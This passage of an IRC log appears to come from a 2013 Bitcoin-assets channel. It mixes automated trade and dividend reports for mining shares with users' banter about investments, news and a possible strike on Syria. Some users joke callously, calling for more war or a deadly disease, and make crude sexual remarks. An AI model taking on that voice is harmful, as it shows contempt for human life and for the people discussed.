TATI AM PT dividends have been paid or scheduled. Aug 28 21:30:29 [BTCTC] [ACTIVEMINING] 75 @ 0.004801 = 0.3601 BTC [-] Aug 28 21:30:31 [BTCTC] [ACTIVEMINING] 300 @ 0.0048 = 1.44 BTC [-] Aug 28 21:36:43 [HAVELOCK] [AM1] 1 @ 2.65 BTC [-] Aug 28 21:37:57 [BTCTC] [TAT.ASICMINER] 18 @ 0.02551 = 0.4592 BTC [+] Aug 28 21:38:23 [HAVELOCK] [AM100] [PAID] 29.53964580 BTC to 250`761 shares, 11780 satoshi per share Aug 28 21:39:14 [BTCTC] [DMS.MINING] 3 @ 0.0035 = 0.0105 BTC [-] Aug 28 21:39:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.02551 = 0.051 BTC [+] Aug 28 21:39:43 [BTCTC] [DMS.MINING] 1 @ 0.00357 BTC [+] Aug 28 21:40:04 [BTCTC] [TAT.ASICMINER] 9 @ 0.0255 = 0.2295 BTC [-] Aug 28 21:40:28 [HAVELOCK] [AM100] 9 @ 0.0265 = 0.2385 BTC [-] Aug 28 21:40:38 [HAVELOCK] [AM1] [PAID] 11.50707936 BTC to 928 shares, 1239987 satoshi per share Aug 28 21:41:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.0255 = 0.2295 BTC [-] Aug 28 21:42:36 [HAVELOCK] [AM100] 3 @ 0.0266 = 0.0798 BTC [+] Aug 28 21:43:56 [HAVELOCK] [AM100] 1 @ 0.0266 BTC [+] Aug 28 21:44:02 [BTCTC] [TAT.ASICMINER] 9 @ 0.0255 = 0.2295 BTC [-] Aug 28 21:44:23 [HAVELOCK] [LABCO] 2 @ 0.0033 = 0.0066 BTC [+] Aug 28 21:44:29 [BTCTC] [BITVPS] 148 @ 0.002689 = 0.398 BTC [+] Aug 28 21:44:30 [BTCTC] [BITVPS] 1 @ 0.00269 BTC [+] Aug 28 21:44:32 [BTCTC] [BITVPS] 10 @ 0.0028 = 0.028 BTC [+] Aug 28 21:44:35 [BTCTC] [BITVPS] 90 @ 0.0028 = 0.252 BTC [+] Aug 28 21:45:14 [HAVELOCK] [SMG] 3 @ 0.00024399 = 0.0007 BTC [-] Aug 28 21:45:35 [HAVELOCK] [KCIM] 1 @ 0.6 BTC [-] Aug 28 21:45:54 [BTCTC] [HOSTED-MINING] 200 @ 0.00264 = 0.528 BTC [-] Aug 28 21:46:06 [BTCTC] [TAT.ASICMINER] 12 @ 0.0255 = 0.306 BTC [-] Aug 28 21:46:21 [HAVELOCK] [AM100] 4 @ 0.02655 = 0.1062 BTC [-] Aug 28 21:46:33 [HAVELOCK] [AM100] 4 @ 0.02655 = 0.1062 BTC [-] Aug 28 21:47:07 [HAVELOCK] [XBOND] 7 @ 0.0012 = 0.0084 BTC [+] Aug 28 21:47:29 [HAVELOCK] [AM100] 1 @ 0.02655 BTC [-] Aug 28 21:47:39 [BTCTC] [ACTIVEMINING] 42 @ 0.004851 = 0.2037 BTC [+] Aug 28 21:47:43 [BTCTC] [ACTIVEMINING] 170 @ 0.00485 = 0.8245 BTC [-] Aug 28 21:47:51 [BTCTC] [ACTIVEMINING] 75 @ 0.005116 = 0.3837 BTC [+] Aug 28 21:48:25 [BTCTC] [ACTIVEMINING] 10 @ 0.005116 = 0.0512 BTC [+] Aug 28 21:49:09 [BTCTC] [COGNITIVE] 1 @ 0.3549 BTC [+] Aug 28 21:49:11 [BTCTC] [RSM] 2 @ 0.0139 = 0.0278 BTC [+] Aug 28 21:49:12 [BTCTC] [COGNITIVE] 2 @ 0.355 = 0.71 BTC [+] Aug 28 21:49:12 [BTCTC] [RSM] 16 @ 0.014 = 0.224 BTC [+] Aug 28 21:49:14 [BTCTC] [RSM] 1 @ 0.01444 BTC [+] Aug 28 21:49:15 [BTCTC] [RSM] 7 @ 0.01445 = 0.1012 BTC [+] Aug 28 21:49:19 [BTCTC] [RSM] 30 @ 0.0145 = 0.435 BTC [+] Aug 28 21:49:21 [BTCTC] [RSM] 99 @ 0.01499 = 1.484 BTC [+] Aug 28 21:49:32 [BTCTC] [DMS.PURCHASE] 310 @ 0.01598 = 4.9538 BTC [+] Aug 28 21:49:44 [BTCTC] [ACTIVEMINING] 32 @ 0.005116 = 0.1637 BTC [+] Aug 28 21:49:46 [BTCTC] [ACTIVEMINING] 10 @ 0.005117 = 0.0512 BTC [+] Aug 28 21:49:49 [BTCTC] [ACTIVEMINING] 58 @ 0.005119 = 0.2969 BTC [+] Aug 28 21:50:33 [BTCTC] [DMS.SELLING] 4 @ 0.01255 = 0.0502 BTC [+] Aug 28 21:50:48 [BTCTC] [RSM] 23 @ 0.015 = 0.345 BTC [+] Aug 28 21:53:21 [HAVELOCK] [AM100] 1 @ 0.02655 BTC [-] Aug 28 21:57:04 [BTCTC] [DMS.MINING] 910 @ 0.0034 = 3.094 BTC [-] Aug 28 21:57:05 [BTCTC] [DMS.MINING] 8 @ 0.0034 = 0.0272 BTC [-] Aug 28 21:57:49 [HAVELOCK] [AM100] 7 @ 0.0266 = 0.1862 BTC [+] Aug 28 21:59:01 [HAVELOCK] [CFIG] 9 @ 0.19 = 1.71 BTC [+] Aug 28 21:59:04 [HAVELOCK] [CFIG] 2 @ 0.19 = 0.38 BTC [+] Aug 28 21:59:15 [HAVELOCK] [AM100] 1 @ 0.0266 BTC [+] Aug 28 21:59:37 [HAVELOCK] [AM100] 19 @ 0.0266 = 0.5054 BTC [+] Aug 28 22:00:15 "You can understand I cannot give you too much details since that would be divulging my communication strategy to potential competitors in a public forum. I certainly hope localbitcoins' users will also try and adopt Dealcoin!" Aug 28 22:00:42 O_o Aug 28 22:00:46 i wasnt aware there was so much strategic competition with marketing in bitcoin Aug 28 22:01:06 [HAVELOCK] [AM1] 2 @ 2.6899 = 5.3798 BTC [+] Aug 28 22:01:26 [HAVELOCK] [AM1] 4 @ 2.69 = 10.76 BTC [+] Aug 28 22:02:17 [HAVELOCK] [CFIG] 32 @ 0.19 = 6.08 BTC [+] Aug 28 22:02:34 [HAVELOCK] [SDSTM] 4 @ 0.00455 = 0.0182 BTC [+] Aug 28 22:03:24 "you assholes convinced me to panic sell last night at 22 and now its up to 32 Angry I'm just going to not mess with my shares untill late oct when things are suppose to be going on." (labcoin) Aug 28 22:03:31 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.001 = 0.018 BTC [-] Aug 28 22:04:04 LOL Aug 28 22:04:10 I love these kids. Aug 28 22:04:10 pale phoenix says "Still, if you are looking to triple or quadruple your investment, and you have a high tolerance for risk, you should invest" Aug 28 22:04:46 ;;seen ukyo Aug 28 22:04:47 ukyo was last seen in #bitcoin-assets 3 weeks, 2 days, 19 hours, 54 minutes, and 38 seconds ago: wait* Aug 28 22:04:50 [HAVELOCK] [AM1] 1 @ 2.7 BTC [+] Aug 28 22:04:51 Hi, Pale Phoenix! Aug 28 22:05:02 ;;seen ukto Aug 28 22:05:02 ukto was last seen in #bitcoin-assets 2 weeks, 0 days, 4 hours, 29 minutes, and 53 seconds ago: thestringpuller: btw, I bought the game on steam. :P Aug 28 22:05:24 lol man those forums Aug 28 22:05:34 It just hurts my head sometimes Aug 28 22:05:50 "amazing company," I should do a drinking game for everytime I read that Aug 28 22:05:57 lol Aug 28 22:06:11 That goes for ActM and Labcoin Aug 28 22:06:13 [HAVELOCK] [AM1] 4 @ 2.73 = 10.92 BTC [+] Aug 28 22:06:23 [HAVELOCK] [KCIM] 1 @ 0.59860416 BTC [-] Aug 28 22:06:23 "To paraphrase that saying for this situation, pick two of: Trustworthy, Fast, or Best price." Aug 28 22:06:30 that;s not the saying is it? Aug 28 22:06:36 I love how these kids scream for a week straight about not getting an update and then as soon as they get a simple, "Everything is on track" they're FREAKING out and JIZZING all over themselves. Aug 28 22:06:46 I thought it was Cheap, Fast, Quality - Pick two Aug 28 22:07:13 i guess trust is quality Aug 28 22:07:18 but not quite Aug 28 22:07:57 well at least the migrated away from the AM thread Aug 28 22:08:05 You can have them back Aug 28 22:08:06 they* Aug 28 22:08:28 The amount of people trying to incite a panic, photoshopped pictures and everyone just being a sheep Aug 28 22:08:34 It can be hard to find anything real Aug 28 22:08:50 Friedcat: "The blades in stock are all sold out. Sorry for the purchasers who missed the queue. If you are still interested, please ask for resellers on later available products." Aug 28 22:08:56 I guess they were underpriced Aug 28 22:09:41 [BTCTC] [TAT.VIRTUALMINE] 800 @ 0.0009 = 0.72 BTC [-] Aug 28 22:12:05 http://www.theverge.com/2013/8/28/4667554/measles-outbreak-in-texas-linked-to-anti-vaccination-megachurch Aug 28 22:12:08 Measles outbreak in Texas traced back to anti-vaccination televangelist | The Verge Aug 28 22:12:15 [HAVELOCK] [AM100] 20 @ 0.0266 = 0.532 BTC [+] Aug 28 22:12:33 That's some old news tat Aug 28 22:13:06 than you for your information Aug 28 22:13:08 k Aug 28 22:13:20 On the flip side, Catherine Zeta Jones is apparently single Aug 28 22:13:35 [BTCTC] [LABCOIN] 3 @ 0.003257 = 0.0098 BTC [+] Aug 28 22:13:38 [BTCTC] [TAT.VIRTUALMINE] 4200 @ 0.0009 = 3.78 BTC [-] Aug 28 22:13:40 40lbs and how many babies later? Aug 28 22:13:47 or is she hot still Aug 28 22:14:13 she has that crotch cancer though Aug 28 22:14:16 Did you ever see that movie Side-Effects? Aug 28 22:14:18 be careful Aug 28 22:14:22 :| Aug 28 22:14:54 Still has it: http://www.bohomoth.com/wp-content/uploads/2013/02/article-2283997-1841356E000005DC-746_634x822.jpg Aug 28 22:15:32 http://www.foxnews.com/entertainment/2013/06/03/michael-douglas-oral-sex-gave-me-cancer/ Aug 28 22:15:32 Michael Douglas: Oral sex can cause cancer | Fox News Aug 28 22:15:45 [BTCTC] [ACTIVEMINING] 100 @ 0.005119 = 0.5119 BTC [+] Aug 28 22:18:10 http://www.usatoday.com/story/money/business/2013/08/28/entanglement-with-syria-could-lift-crude-oil-us-gas-prices/2712405/ Aug 28 22:18:11 Syrian crisis lifting crude oil costs; gas prices to follow? Aug 28 22:18:24 "That September drop you were expecting for gasoline prices? Don't hold your breath." Aug 28 22:18:34 [MPEX] [S.MPOE] 6750 @ 0.00087329 = 5.8947 BTC [-] Aug 28 22:18:54 cue US troops in 3, 2, Aug 28 22:19:55 https://bitcointalk.org/index.php?topic=282303.msg3028945#msg3028945 Aug 28 22:19:59 Quick Fire Sale 6 Individual Avalon Modules For Sale 12BTC Hosted Or Shipped Aug 28 22:20:09 some scammers arent evolving Aug 28 22:20:51 I want to see what Russia and China have to say about it Aug 28 22:21:01 So many people like, don't you try to Iraq us again Aug 28 22:21:06 are like* Aug 28 22:21:17 they have a say? Aug 28 22:21:30 [BTCTC] [LABCOIN] 6 @ 0.003151 = 0.0189 BTC [-] Aug 28 22:21:31 [BTCTC] [LABCOIN] 600 @ 0.00315 = 1.89 BTC [-] Aug 28 22:21:32 Well they've made some threats against the us if we try to invade Aug 28 22:21:33 [BTCTC] [LABCOIN] 20 @ 0.003108 = 0.0622 BTC [-] Aug 28 22:21:34 [BTCTC] [LABCOIN] 2600 @ 0.003107 = 8.0782 BTC [-] Aug 28 22:21:38 Iran said they would take action too Aug 28 22:21:44 mmhmm Aug 28 22:21:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.02719 BTC [+] Aug 28 22:22:02 We simply cannot afford to deal with those as well, I mean ffs let alone invading another country AGAIN Aug 28 22:22:58 [BTCTC] [DMS.MINING] 1 @ 0.003598 BTC [+] Aug 28 22:23:14 but the troops need jobs Aug 28 22:23:17 war provides Aug 28 22:23:39 [BTCTC] [ASICMINER-PT] 2 @ 2.704 = 5.408 BTC [+] Aug 28 22:24:06 Yeah and then when they come back home, they'll be just homeless Aug 28 22:24:26 thats the point, never come home Aug 28 22:24:30 just find new war Aug 28 22:24:32 Ah I see Aug 28 22:25:11 [BTCTC] [TAT.ASICMINER] 2 @ 0.02719 = 0.0544 BTC [+] Aug 28 22:25:31 Ahhhhh I can go on and on with this Aug 28 22:25:42 simmer Aug 28 22:25:53 But I see we're on the same page regardless so I'll stop there :) Aug 28 22:26:06 [BTCTC] [TAT.ASICMINER] 1 @ 0.02719 BTC [+] Aug 28 22:28:55 [HAVELOCK] [KCIM] 1 @ 0.262 BTC [-] Aug 28 22:29:03 [HAVELOCK] [KCIM] 3 @ 0.26100001 = 0.783 BTC [-] Aug 28 22:29:09 [HAVELOCK] [KCIM] 1 @ 0.26 BTC [-] Aug 28 22:29:18 [BTCTC] [HOSTED-MINING] 1 @ 0.002799 BTC [+] Aug 28 22:29:43 [MPEX] [S.MPOE] 8060 @ 0.00087329 = 7.0387 BTC [-] Aug 28 22:31:26 [BTCTC] [ACTIVEMINING] 161 @ 0.005119 = 0.8242 BTC [+] Aug 28 22:31:27 [BTCTC] [ACTIVEMINING] 200 @ 0.00512 = 1.024 BTC [+] Aug 28 22:31:28 [BTCTC] [ACTIVEMINING] 355 @ 0.005121 = 1.818 BTC [+] Aug 28 22:31:29 [BTCTC] [ACTIVEMINING] 284 @ 0.005122 = 1.4546 BTC [+] Aug 28 22:35:37 [HAVELOCK] [AM100] 67 @ 0.0266 = 1.7822 BTC [+] Aug 28 22:36:00 [BTCTC] [ACTIVEMINING] 216 @ 0.005122 = 1.1064 BTC [+] Aug 28 22:36:00 [BTCTC] [ACTIVEMINING] 685 @ 0.005123 = 3.5093 BTC [+] Aug 28 22:36:01 [BTCTC] [ACTIVEMINING] 28 @ 0.00516 = 0.1445 BTC [+] Aug 28 22:36:02 [BTCTC] [ACTIVEMINING] 1 @ 0.00525 BTC [+] Aug 28 22:36:04 [BTCTC] [ACTIVEMINING] 200 @ 0.00525 = 1.05 BTC [+] Aug 28 22:36:05 [BTCTC] [ACTIVEMINING] 216 @ 0.00526 = 1.1362 BTC [+] Aug 28 22:36:06 [BTCTC] [ACTIVEMINING] 407 @ 0.005264 = 2.1424 BTC [+] Aug 28 22:36:55 [HAVELOCK] [AM100] 10 @ 0.02675 = 0.2675 BTC [+] Aug 28 22:39:13 [BTCTC] [ACTIVEMINING] 300 @ 0.005268 = 1.5804 BTC [+] Aug 28 22:39:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02719 = 0.0544 BTC [+] Aug 28 22:39:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0272 BTC [+] Aug 28 22:40:52 CoinMKT coming http://us7.campaign-archive2.com/?u=48a8e45f04c09afe15c6a0f38&id=9126d53e85&e=bf3dfa658a Aug 28 22:45:01 [HAVELOCK] [AM100] 4 @ 0.0268 = 0.1072 BTC [+] Aug 28 22:45:21 [MPEX] [S.MPOE] 3350 @ 0.00087339 = 2.9259 BTC [+] Aug 28 22:45:23 [BTCTC] [BASIC-MINING] 2 @ 0.2 = 0.4 BTC [-] Aug 28 22:45:44 [BTCTC] [BASIC-MINING] 2 @ 0.194 = 0.388 BTC [-] Aug 28 22:46:07 [BTCTC] [BASIC-MINING] 1 @ 0.1902 BTC [-] Aug 28 22:46:09 [BTCTC] [BASIC-MINING] 5 @ 0.1901 = 0.9505 BTC [-] Aug 28 22:46:19 [BTCTC] [LABCOIN] 8 @ 0.003255 = 0.026 BTC [+] Aug 28 22:46:21 [BTCTC] [ACTIVEMINING] 10 @ 0.00525 = 0.0525 BTC [-] Aug 28 22:47:29 [HAVELOCK] [AM100] 1 @ 0.0268 BTC [+] Aug 28 22:48:13 [BTCTC] [TAT.ASICMINER] 3 @ 0.0272 = 0.0816 BTC [+] Aug 28 22:50:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.0272 = 0.1088 BTC [+] Aug 28 22:50:05 [BTCTC] [TAT.ASICMINER] 118 @ 0.02721 = 3.2108 BTC [+] Aug 28 22:50:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.02721 = 0.1088 BTC [+] Aug 28 22:53:46 [BTCTC] [DMS.MINING] 8 @ 0.003597 = 0.0288 BTC [-] Aug 28 22:54:27 [BTCTC] [LABCOIN] 20 @ 0.003255 = 0.0651 BTC [+] Aug 28 22:54:59 [BTCTC] [DMS.MINING] 142 @ 0.003598 = 0.5109 BTC [+] Aug 28 22:55:38 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.000792 = 0.0198 BTC [-] Aug 28 22:56:37 [BTCTC] [RSM] 2 @ 0.015 = 0.03 BTC [+] Aug 28 22:59:16 [BTCTC] [TAT.MINIGAME] 5 @ 0.0002301 = 0.0012 BTC [-] Aug 28 23:00:06 [HAVELOCK] [AM1] 3 @ 2.40000002 = 7.2 BTC [-] Aug 28 23:00:18 [HAVELOCK] [AM1] 6 @ 2.40000001 = 14.4 BTC [-] Aug 28 23:00:23 [HAVELOCK] [AM100] 25 @ 0.0268 = 0.67 BTC [+] Aug 28 23:00:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.000793 BTC [+] Aug 28 23:00:36 [HAVELOCK] [AM100] 6 @ 0.0268 = 0.1608 BTC [+] Aug 28 23:00:38 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.0007921 = 0.0388 BTC [-] Aug 28 23:01:20 [BTCTC] [LABCOIN] 1 @ 0.00325 BTC [-] Aug 28 23:02:10 [HAVELOCK] [AM100] 63 @ 0.0268 = 1.6884 BTC [+] Aug 28 23:02:27 [HAVELOCK] [AM100] 5 @ 0.02689999 = 0.1345 BTC [+] Aug 28 23:02:36 [HAVELOCK] [AM100] 2 @ 0.0269 = 0.0538 BTC [+] Aug 28 23:03:17 [HAVELOCK] [AM100] 100 @ 0.0269 = 2.69 BTC [+] Aug 28 23:04:48 [BTCTC] [TAT.VIRTUALMINE] 78 @ 0.0007922 = 0.0618 BTC [+] Aug 28 23:06:03 [BTCTC] [DMS.MINING] 28 @ 0.003597 = 0.1007 BTC [-] Aug 28 23:06:14 [BTCTC] [BASIC-MINING] 5 @ 0.19 = 0.95 BTC [-] Aug 28 23:06:15 "afford" Aug 28 23:06:25 the states have yet to hit hyperinflation Aug 28 23:06:39 they can afford anything they talk their money press operators into printing the cash for Aug 28 23:06:45 for now Aug 28 23:07:26 [BTCTC] [HOSTED-MINING] 1 @ 0.002798 BTC [-] Aug 28 23:09:07 [BTCTC] [ASICMINER-PT] 2 @ 2.715 = 5.43 BTC [+] Aug 28 23:09:09 [BTCTC] [ASICMINER-PT] 2 @ 2.71 = 5.42 BTC [-] Aug 28 23:09:10 [BTCTC] [ASICMINER-PT] 1 @ 2.705 BTC [-] Aug 28 23:09:10 [BTCTC] [ASICMINER-PT] 1 @ 2.704 BTC [-] Aug 28 23:09:11 [BTCTC] [ASICMINER-PT] 4 @ 2.704 = 10.816 BTC [-] Aug 28 23:11:52 for now Aug 28 23:12:12 for now Aug 28 23:12:54 for, now... Aug 28 23:13:26 [MPEX] [S.MPOE] 5600 @ 0.00087422 = 4.8956 BTC [+] Aug 28 23:13:40 [MPEX] [S.MPOE] 6500 @ 0.00087576 = 5.6924 BTC [+] Aug 28 23:15:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.02561 = 0.0512 BTC [-] Aug 28 23:15:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.0256 BTC [-] Aug 28 23:15:50 [BTCTC] [TAT.ASICMINER] 9 @ 0.0256 = 0.2304 BTC [-] Aug 28 23:15:51 [BTCTC] [TAT.ASICMINER] 1 @ 0.02556 BTC [-] Aug 28 23:15:52 [BTCTC] [TAT.ASICMINER] 5 @ 0.02555 = 0.1278 BTC [-] Aug 28 23:15:53 [BTCTC] [TAT.ASICMINER] 28 @ 0.02553 = 0.7148 BTC [-] Aug 28 23:16:26 [BTCTC] [LABCOIN] 45 @ 0.003107 = 0.1398 BTC [-] Aug 28 23:16:28 [BTCTC] [LABCOIN] 22 @ 0.003105 = 0.0683 BTC [-] Aug 28 23:16:28 [BTCTC] [LABCOIN] 420 @ 0.003105 = 1.3041 BTC [-] Aug 28 23:16:29 [BTCTC] [LABCOIN] 53 @ 0.003102 = 0.1644 BTC [-] Aug 28 23:16:31 [BTCTC] [LABCOIN] 460 @ 0.0031 = 1.426 BTC [-] Aug 28 23:17:30 [BTCTC] [TAT.ASICMINER] 3 @ 0.02552 = 0.0766 BTC [-] Aug 28 23:18:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.02552 BTC [-] Aug 28 23:19:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02553 BTC [+] Aug 28 23:19:39 [BTCTC] [ASICMINER-PT] 1 @ 2.809 BTC [+] Aug 28 23:21:39 rulother you may be interested in http://bitbet.us/bet/522/israel-bombarded-from-syria/ Aug 28 23:21:45 ThickAsThieves you too Aug 28 23:22:01 hmmmmm Aug 28 23:22:09 This is a bet I like Aug 28 23:22:15 gambling wise.. Aug 28 23:22:21 Nothing like betting on another life! Aug 28 23:22:37 You make it sound so bad Aug 28 23:22:59 Do I? Aug 28 23:23:09 morals Aug 28 23:23:11 *waves hands* Aug 28 23:23:23 Hmm, How you guys feeling about AM? Aug 28 23:23:31 You almost made me feel, and I don't like feeling Aug 28 23:23:47 Div wasn't too bad Aug 28 23:23:49 kleeck you make it sound like human life has some inherent value Aug 28 23:24:01 how many btc(s) for a life? Aug 28 23:24:04 did AM keep a part again for themselves or is the div the entire earnings? Aug 28 23:24:35 Rulother: for most, not a lot. Aug 28 23:25:00 The avg bitcointalk user? Aug 28 23:25:03 how many corns is the average btctalk worth? Aug 28 23:25:05 .00045 Aug 28 23:25:05 lololol Aug 28 23:25:38 now an interesting question: are they a statistically representative sample of humanity? Aug 28 23:25:46 eg: greedy, lazy and moronic? Aug 28 23:25:51 Yes Aug 28 23:26:06 [HAVELOCK] [AM100] 6 @ 0.0256 = 0.1536 BTC [-] Aug 28 23:26:11 there are too many homo sapiens on this planet Aug 28 23:26:25 more war, plz. Aug 28 23:26:38 It will keep growing until we start spilling out of planet Earth Aug 28 23:26:45 Then it will still keep growing Aug 28 23:27:02 [HAVELOCK] [XBOND] 100 @ 0.001185 = 0.1185 BTC [-] Aug 28 23:27:05 Until we spill out of the solar system Aug 28 23:27:05 at geometric rates even Aug 28 23:27:06 We need something like another horrible disease Aug 28 23:27:17 Something pretty Aug 28 23:27:18 no exponential curve lasts for long. Aug 28 23:27:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02734 BTC [+] Aug 28 23:27:37 We are a disease Aug 28 23:27:54 everything is a disease by that metric Aug 28 23:28:09 reproducing things reproduce, topologically and tautologically. Aug 28 23:28:18 [HAVELOCK] [SMG] 92 @ 0.00024399 = 0.0224 BTC [-] Aug 28 23:28:23 you see a block with 200 bitcoins in fees Aug 28 23:28:28 [HAVELOCK] [SMG] 20 @ 0.000244 = 0.0049 BTC [+] Aug 28 23:28:45 [HAVELOCK] [SMG] 25 @ 0.0002449 = 0.0061 BTC [+] Aug 28 23:29:24 [BTCTC] [BASIC-MINING] 16 @ 0.19 = 3.04 BTC [-] Aug 28 23:29:28 http://blockchain.info/tx/4ed20e0768124bc67dc684d57941be1482ccdaa45dadb64be12afba8c8554537 Aug 28 23:29:30 Bitcoin Transaction 4ed20e0768124bc67dc684d57941be1482ccdaa45dadb64be12afba8c8554537 Aug 28 23:29:39 [BTCTC] [BASIC-MINING] 5 @ 0.1977 = 0.9885 BTC [+] Aug 28 23:30:36 [BTCTC] [LABCOIN] 440 @ 0.0031 = 1.364 BTC [-] Aug 28 23:30:38 [BTCTC] [RSM] 15 @ 0.015 = 0.225 BTC [+] Aug 28 23:30:43 [BTCTC] [LABCOIN] 100 @ 0.0031 = 0.31 BTC [-] Aug 28 23:30:46 [BTCTC] [LABCOIN] 4 @ 0.0031 = 0.0124 BTC [-] Aug 28 23:30:47 [BTCTC] [LABCOIN] 1 @ 0.0031 BTC [-] Aug 28 23:30:49 [BTCTC] [LABCOIN] 1164 @ 0.0031 = 3.6084 BTC [-] Aug 28 23:31:15 Yes, but we're not limited by the environment too much. Only barrier we have right now is space and at this rate... Aug 28 23:31:36 I don't know, I've seen the 5th Element Aug 28 23:32:08 [BTCTC] [DMS.MINING] 1 @ 0.003596 BTC [-] Aug 28 23:32:30 And at this rate, even if it takes 2 millennia more to travel efficiently in space, on a cosmological scale, we might as well already be there. Aug 28 23:32:32 [BTCTC] [BTC-BOND] 100 @ 0.009995 = 0.9995 BTC [-] Aug 28 23:32:49 Only cure is a big rock smashing into Earth Aug 28 23:33:02 [BTCTC] [DMS.MINING] 8 @ 0.003411 = 0.0273 BTC [-] Aug 28 23:33:03 [BTCTC] [DMS.MINING] 1 @ 0.00341 BTC [-] Aug 28 23:34:00 [BTCTC] [DMS.MINING] 30 @ 0.0034 = 0.102 BTC [-] Aug 28 23:34:00 [BTCTC] [DMS.MINING] 23 @ 0.0034 = 0.0782 BTC [-] Aug 28 23:34:02 [BTCTC] [DMS.MINING] 7 @ 0.0034 = 0.0238 BTC [-] Aug 28 23:34:56 [HAVELOCK] [XBOND] 10 @ 0.001185 = 0.0119 BTC [-] Aug 28 23:38:52 [BTCTC] [DMS.MINING] 20 @ 0.00337 = 0.0674 BTC [-] Aug 28 23:39:44 [BTCTC] [MININGCO.ETF] 1 @ 0.1199 BTC [+] Aug 28 23:40:13 [BTCTC] [ACTIVEMINING] 645 @ 0.004902 = 3.1618 BTC [-] Aug 28 23:42:30 [HAVELOCK] [AM100] 5 @ 0.0268 = 0.134 BTC [+] Aug 28 23:44:14 [BTCTC] [ACTIVEMINING] 100 @ 0.004903 = 0.4903 BTC [+] Aug 28 23:44:14 [BTCTC] [ACTIVEMINING] 645 @ 0.004902 = 3.1618 BTC [-] Aug 28 23:44:14 [BTCTC] [ACTIVEMINING] 2480 @ 0.004901 = 12.1545 BTC [-] Aug 28 23:45:13 [BTCTC] [DMS.SELLING] 76 @ 0.01255 = 0.9538 BTC [+] Aug 28 23:45:15 [BTCTC] [DMS.SELLING] 1 @ 0.01255 BTC [+] Aug 28 23:45:15 [BTCTC] [DMS.SELLING] 61 @ 0.01257 = 0.7668 BTC [+] Aug 28 23:45:16 [BTCTC] [DMS.SELLING] 300 @ 0.01258 = 3.774 BTC [+] Aug 28 23:45:17 [BTCTC] [DMS.SELLING] 597 @ 0.01259 = 7.5162 BTC [+] Aug 28 23:45:18 [BTCTC] [DMS.SELLING] 85 @ 0.0126 = 1.071 BTC [+] Aug 28 23:45:31 benkay: "israel bombarded from lebanon" seems much more likely than from syria Aug 28 23:45:53 Iran was the one that made the threat Aug 28 23:46:03 We would be funding two wars then ;) Aug 28 23:47:54 [BTCTC] [DMS.PURCHASE] 630 @ 0.01598 = 10.0674 BTC [+] Aug 28 23:49:11 [BTCTC] [DMS.MINING] 172 @ 0.00337 = 0.5796 BTC [-] Aug 28 23:49:23 sounds good, I'd be happy to donate to irans war effort against the US Aug 28 23:49:40 IPO anyone? Aug 28 23:50:18 is this ipo going to produce miners to generate money for funding? :P Aug 28 23:50:19 so it came to corporations leading wars financed by bitcoin IPOs? Aug 28 23:50:20 [BTCTC] [ACTIVEMINING] 25 @ 0.004902 = 0.1226 BTC [+] Aug 28 23:50:21 [BTCTC] [ACTIVEMINING] 20 @ 0.004901 = 0.098 BTC [-] Aug 28 23:50:22 [BTCTC] [ACTIVEMINING] 10 @ 0.0049 = 0.049 BTC [-] Aug 28 23:50:49 eve spilling to rl Aug 28 23:51:00 [BTCTC] [ACTIVEMINING] 19 @ 0.0049 = 0.0931 BTC [-] Aug 28 23:51:02 [BTCTC] [ACTIVEMINING] 51 @ 0.0049 = 0.2499 BTC [-] Aug 28 23:51:03 [BTCTC] [ACTIVEMINING] 502 @ 0.004855 = 2.4372 BTC [-] Aug 28 23:51:48 Rulother, dividends from iranian oil/gas? Aug 28 23:52:03 [BTCTC] [ASICMINER-PT] 1 @ 2.76 BTC [-] Aug 28 23:53:20 [HAVELOCK] [AM100] 3 @ 0.0256 = 0.0768 BTC [-] Aug 28 23:53:41 but what i'd like to see, actual IPO for asteroid mining Aug 28 23:54:11 Helium 2 mining woot woot Aug 28 23:54:17 [HAVELOCK] [AM100] 1 @ 0.0255 BTC [-] Aug 28 23:54:20 but i guess btc needs to go 100x up first Aug 28 23:54:25 [HAVELOCK] [AM100] 5 @ 0.0253 = 0.1265 BTC [-] Aug 28 23:54:32 [HAVELOCK] [AM100] 4 @ 0.02521 = 0.1008 BTC [-] Aug 28 23:54:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.02555 = 0.0511 BTC [-] Aug 28 23:54:46 [HAVELOCK] [AM100] 2 @ 0.025 = 0.05 BTC [-] Aug 28 23:54:48 if you hate your coin that much just put it in actm Aug 28 23:54:58 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Aug 28 23:55:12 [BTCTC] [NASTY-PT] 1 @ 0.002079 BTC [+] Aug 28 23:55:15 Asicminer got a block with 200 bitcoins in fees Aug 28 23:55:26 neat Aug 28 23:56:45 wait for the rally Aug 28 23:57:23 [BTCTC] [LABCOIN] 1000 @ 0.003061 = 3.061 BTC [-] Aug 28 23:57:38 200 BTC divided by 400000 shares = 0.0005 per share Aug 28 23:57:52 [BTCTC] [ASICMINER-PT] 2 @ 2.74 = 5.48 BTC [-] Aug 28 23:57:53 [BTCTC] [ASICMINER-PT] 2 @ 2.704 = 5.408 BTC [-] Aug 28 23:57:54 [BTCTC] [ASICMINER-PT] 1 @ 2.67 BTC [-] Aug 28 23:57:55 [BTCTC] [ASICMINER-PT] 2 @ 2.67 = 5.34 BTC [-] Aug 28 23:57:58 yes but clearly jesus is on AM's side now Aug 28 23:57:59 rallytime see Aug 28 23:58:05 That's a nice bonus per share but meh Aug 28 23:58:09 dub = good point Aug 28 23:58:29 [BTCTC] [ASICMINER-PT] 1 @ 2.653 BTC [-] Aug 28 23:58:30 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Aug 28 23:58:32 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Aug 28 23:58:36 